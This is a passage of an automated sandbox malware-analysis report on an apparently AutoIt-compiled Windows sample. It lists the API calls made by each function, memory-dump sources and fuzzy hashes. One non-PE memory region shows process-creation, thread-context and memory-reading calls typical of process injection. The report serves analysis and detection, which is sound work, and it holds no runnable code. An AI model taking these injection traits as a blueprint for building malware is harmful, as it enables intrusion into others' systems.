                                                          • Part of subcall function 006A1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 006A1C12
                                                          • Part of subcall function 006A1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 006A1C1A
                                                          • Part of subcall function 006A1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 006A1C22
                                                          • Part of subcall function 006A1B4A: RegisterWindowMessageW.USER32(00000004,?,006A12C4), ref: 006A1BA2
                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 006A136A
                                                        • OleInitialize.OLE32 ref: 006A1388
                                                        • CloseHandle.KERNEL32(00000000,00000000), ref: 006E24AB
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                        • String ID:
                                                        • API String ID: 1986988660-0
                                                        • Opcode ID: 97da3df5d39c263585457795d888215002f7812d1f365fe58e47637eb41dcaec
                                                        • Instruction ID: ec5668439cf32dee72379ae872fbad6b6886944502d5e21ddaab597258f90f35
                                                        • Opcode Fuzzy Hash: 97da3df5d39c263585457795d888215002f7812d1f365fe58e47637eb41dcaec
                                                        • Instruction Fuzzy Hash: A4719BB49112408EC788EF7DA8566553AE5AB8A3D47D5C22E900EDB261EB3C48A0CF5D
                                                        APIs
                                                          • Part of subcall function 006A3923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 006A3A04
                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0070C259
                                                        • KillTimer.USER32(?,00000001,?,?), ref: 0070C261
                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0070C270
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: IconNotifyShell_Timer$Kill
                                                        • String ID:
                                                        • API String ID: 3500052701-0
                                                        • Opcode ID: e9eb8f32b7cb484c7677ec1e247cb3cd95f81b912c866de1702ce6a510a897ab
                                                        • Instruction ID: 0f544f9c7541cf212c79fe0841060137fa858a9cfc5c12b6c26a5fb1e6f0db6e
                                                        • Opcode Fuzzy Hash: e9eb8f32b7cb484c7677ec1e247cb3cd95f81b912c866de1702ce6a510a897ab
                                                        • Instruction Fuzzy Hash: 0031C570904344AFEB239F648855BEBBBECAF06308F00459DE6DEA3281C7785A84CB55
                                                        APIs
                                                        • CloseHandle.KERNELBASE(00000000,00000000,?,?,006D85CC,?,00768CC8,0000000C), ref: 006D8704
                                                        • GetLastError.KERNEL32(?,006D85CC,?,00768CC8,0000000C), ref: 006D870E
                                                        • __dosmaperr.LIBCMT ref: 006D8739
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: CloseErrorHandleLast__dosmaperr
                                                        • String ID:
                                                        • API String ID: 2583163307-0
                                                        • Opcode ID: fc00fb261cb1937d8b8ea235d65455c3d8451f664250e25a08165bc29a5d8bb6
                                                        • Instruction ID: 9fb5be4e376d257a5452d5b180af9014eb94e4a302a2f5a8be2c0903bcf72448
                                                        • Opcode Fuzzy Hash: fc00fb261cb1937d8b8ea235d65455c3d8451f664250e25a08165bc29a5d8bb6
                                                        • Instruction Fuzzy Hash: 58018232E041B02ED6656734584DBBE2B478B81774F36011FF8059B3D3DE64CC818294
                                                        APIs
                                                        • TranslateMessage.USER32(?), ref: 006ADB7B
                                                        • DispatchMessageW.USER32(?), ref: 006ADB89
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006ADB9F
                                                        • Sleep.KERNEL32(0000000A), ref: 006ADBB1
                                                        • TranslateAcceleratorW.USER32(?,?,?), ref: 006F1CC9
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                        • String ID:
                                                        • API String ID: 3288985973-0
                                                        • Opcode ID: 7dfdfbd04b42248ac383d45ead6892dc1b844c438e9a4dafa60d61d3faeb9399
                                                        • Instruction ID: 6e77503be2e22aeabdbcad1e91388eb894e52b431e2f6c42a1d0c8b2263744d3
                                                        • Opcode Fuzzy Hash: 7dfdfbd04b42248ac383d45ead6892dc1b844c438e9a4dafa60d61d3faeb9399
                                                        • Instruction Fuzzy Hash: 97F05E706043449BEB30DB608C49FEA73AAEF46351F508518E65A971C0DB3894888F2A
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00712CD4,?,?,?,00000004,00000001), ref: 00712FF2
                                                        • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00712CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00713006
                                                        • CloseHandle.KERNEL32(00000000,?,00712CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0071300D
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: File$CloseCreateHandleTime
                                                        • String ID:
                                                        • API String ID: 3397143404-0
                                                        • Opcode ID: 1c432edd710b0f2d9d9bcafd3ec7cd57efe1b85ce371d8f5b97075b912be2b90
                                                        • Instruction ID: 9b5f7a083b9bd50672060e66d40e5abff8ea175c1203df0863d36d5a9a82061e
                                                        • Opcode Fuzzy Hash: 1c432edd710b0f2d9d9bcafd3ec7cd57efe1b85ce371d8f5b97075b912be2b90
                                                        • Instruction Fuzzy Hash: 98E0863228121477E2311759BC0DFCB3A5CD78AB72F118210F719750D046A4550153AC
                                                        APIs
                                                        • __Init_thread_footer.LIBCMT ref: 006B17F6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Init_thread_footer
                                                        • String ID: CALL
                                                        • API String ID: 1385522511-4196123274
                                                        • Opcode ID: bfdbe135aa32a7a759521c6e71e765d40a9655bfcc68371ed32674e5d054b4ef
                                                        • Instruction ID: b4f7e80ea84b8635843233bf0c195c7d7590c476f1b666ef219c0f04b5ff9fbc
                                                        • Opcode Fuzzy Hash: bfdbe135aa32a7a759521c6e71e765d40a9655bfcc68371ed32674e5d054b4ef
                                                        • Instruction Fuzzy Hash: F922AEB1608201EFC714DF14C490AAABBF2BF86314F64896DF5968B362D735ED81CB52
                                                        APIs
                                                        • _wcslen.LIBCMT ref: 00716F6B
                                                          • Part of subcall function 006A4ECB: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00771418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006A4EFD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad_wcslen
                                                        • String ID: >>>AUTOIT SCRIPT<<<
                                                        • API String ID: 3312870042-2806939583
                                                        • Opcode ID: 8d0f6fef67eec3979579644e29b86011430d3fd57556d8f28d1534b107235084
                                                        • Instruction ID: df10714a5263a0d97a7ff6e92172deccebbd721d21b917707167b6ebe76f1566
                                                        • Opcode Fuzzy Hash: 8d0f6fef67eec3979579644e29b86011430d3fd57556d8f28d1534b107235084
                                                        • Instruction Fuzzy Hash: 5FB17D315082018FCB58FF24C8919AEB7F6AF95310F14891DF496972A2DB34ED89CF96
                                                        APIs
                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 016D4913
                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 016D49A9
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 016D49CB
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366602900.00000000016D2000.00000040.00000020.00020000.00000000.sdmp, Offset: 016D2000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_16d2000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                        • String ID:
                                                        • API String ID: 2438371351-0
                                                        • Opcode ID: 47f45bba1b7d6f78db91ee930b61901a72fbf3bd75938062ef2b5451d70cd9db
                                                        • Instruction ID: 9448af8d2a2e52027d549c413495d7c2775d4a67b0317817382beae2addb5277
                                                        • Opcode Fuzzy Hash: 47f45bba1b7d6f78db91ee930b61901a72fbf3bd75938062ef2b5451d70cd9db
                                                        • Instruction Fuzzy Hash: 2B12CE24E24658C6EB24DF64D8507DEB272EF68300F1090E9910DEB7A5E77A4F81CF5A
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID:
                                                        • API String ID: 544645111-0
                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                        • Instruction ID: 881030a601d1f81703dc9e1b141fec1c16d64a60e14f8616c552a6de90acb2e7
                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                        • Instruction Fuzzy Hash: 2131C6B5A00109DBD718DF59D880AA9FBA6FF49300B6486A5E809CF766D731EDC1CBD0
                                                        APIs
                                                          • Part of subcall function 006A4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,006A4EDD,?,00771418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006A4E9C
                                                          • Part of subcall function 006A4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 006A4EAE
                                                          • Part of subcall function 006A4E90: FreeLibrary.KERNEL32(00000000,?,?,006A4EDD,?,00771418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006A4EC0
                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00771418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006A4EFD
                                                          • Part of subcall function 006A4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,006E3CDE,?,00771418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006A4E62
                                                          • Part of subcall function 006A4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 006A4E74
                                                          • Part of subcall function 006A4E59: FreeLibrary.KERNEL32(00000000,?,?,006E3CDE,?,00771418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006A4E87
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressFreeProc
                                                        • String ID:
                                                        • API String ID: 2632591731-0
                                                        • Opcode ID: ac52bd9c6b26dd56824d97695395d9b7cb6771759f346cd983239c92d456e6f6
                                                        • Instruction ID: 770126a5aca4ad0f28f0243ca1181502ea7425c814dbfeee7e9169ae5294cbd6
                                                        • Opcode Fuzzy Hash: ac52bd9c6b26dd56824d97695395d9b7cb6771759f346cd983239c92d456e6f6
                                                        • Instruction Fuzzy Hash: E1110432600305AADB10FB60DC06FADB7A6AFC1B10F20842DF452A61C2DEB5AE059B59
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: __wsopen_s
                                                        • String ID:
                                                        • API String ID: 3347428461-0
                                                        • Opcode ID: 7cef15def9c8cb45dfc325f41eb7adcbf1b365d5c43efedf99b20af142fe8a22
                                                        • Instruction ID: ec573ec7964a4d28643ae53bb98ae23aadb3ca21970d7c3cb992a55f731d61af
                                                        • Opcode Fuzzy Hash: 7cef15def9c8cb45dfc325f41eb7adcbf1b365d5c43efedf99b20af142fe8a22
                                                        • Instruction Fuzzy Hash: B111187590420AAFCB15DF58E945ADA7BF5EF48314F10405AF808AB312DB31EA11CBA5
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                        • Instruction ID: 1d0d6e5e8bf338cdf70b00f315255dad2e9e58213d69855a4b61723bab1175b8
                                                        • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                        • Instruction Fuzzy Hash: 9DF0D632921A109AC6312A768C05FBA33AFDF62331F10072EF421933D2DA75980286A9
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000000,?,00771444,?,006BFDF5,?,?,006AA976,00000010,00771440,006A13FC,?,006A13C6,?,006A1129), ref: 006D3852
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: e68f40b971dde04fc92a82441575004f69d55a666c8ec0364dee2609043c6258
                                                        • Instruction ID: ec27d3495b65ffcf2232f122da6d9cad17e136ed14cc602f2deaf159d3f6862c
                                                        • Opcode Fuzzy Hash: e68f40b971dde04fc92a82441575004f69d55a666c8ec0364dee2609043c6258
                                                        • Instruction Fuzzy Hash: E5E0E53190023456E62166669C01FEA374BEF427B0F09002ABC1596780CB50DE01A3E6
                                                        APIs
                                                        • FreeLibrary.KERNEL32(?,?,00771418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006A4F6D
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: FreeLibrary
                                                        • String ID:
                                                        • API String ID: 3664257935-0
                                                        • Opcode ID: 9ce5c5fbf15134f03e04ad132a0e1e9d44e33cd96a1240c3c42001ea6937b4c4
                                                        • Instruction ID: 23785070fd4eb80991404af2bf6d8b2052d3a0d4fc7655819fd86023c5acd475
                                                        • Opcode Fuzzy Hash: 9ce5c5fbf15134f03e04ad132a0e1e9d44e33cd96a1240c3c42001ea6937b4c4
                                                        • Instruction Fuzzy Hash: 24F0A071005341CFDB34AF20D890862B7F2EF81319320D97EE1DA82610CBB19C44DF00
                                                        APIs
                                                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006A2DC4
                                                          • Part of subcall function 006A6B57: _wcslen.LIBCMT ref: 006A6B6A
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: LongNamePath_wcslen
                                                        • String ID:
                                                        • API String ID: 541455249-0
                                                        • Opcode ID: 56aaf19ecebb32f8751130aa43690b07b1018b7157e035fef66fed60bb077aeb
                                                        • Instruction ID: 67de308d84036b99c53d773c00f1a3774f1846835a166cec7bfd160ebc1258c0
                                                        • Opcode Fuzzy Hash: 56aaf19ecebb32f8751130aa43690b07b1018b7157e035fef66fed60bb077aeb
                                                        • Instruction Fuzzy Hash: D0E0CD726002245BD711A258DC05FDA77DDDFC9790F044075FD09E7248D974AD808695
                                                        APIs
                                                          • Part of subcall function 006A3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 006A3908
                                                          • Part of subcall function 006AD730: GetInputState.USER32 ref: 006AD807
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 006A2B6B
                                                          • Part of subcall function 006A30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 006A314E
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                        • String ID:
                                                        • API String ID: 3667716007-0
                                                        • Opcode ID: 1264cf64257bac242921c78a0fe6f1de230ae4ad7b929b652f53017b64c114e1
                                                        • Instruction ID: 07d43bf1e85195aee31e7afdf4676796eaef88355f9e45519552f3848f1a9344
                                                        • Opcode Fuzzy Hash: 1264cf64257bac242921c78a0fe6f1de230ae4ad7b929b652f53017b64c114e1
                                                        • Instruction Fuzzy Hash: DBE0863230425407CA48BB78A8565BDA75B9FD3395F40553EF14753262CE288D454B6A
                                                        APIs
                                                        • CreateFileW.KERNELBASE(00000000,00000000,?,006E0704,?,?,00000000,?,006E0704,00000000,0000000C), ref: 006E03B7
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: d0ee2859e23a648ec96d3df0f0b8163c23c0faa604f6abd171b2ab022f9346db
                                                        • Instruction ID: 2771f3e321c2b8561938b030d69f9973a38b4610a9d1e01f1153fe57bd52778b
                                                        • Opcode Fuzzy Hash: d0ee2859e23a648ec96d3df0f0b8163c23c0faa604f6abd171b2ab022f9346db
                                                        • Instruction Fuzzy Hash: 42D06C3204010DBBDF028F84DD06EDA3BAAFB48714F018000BE1866020C736E821AB94
                                                        APIs
                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 006A1CBC
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
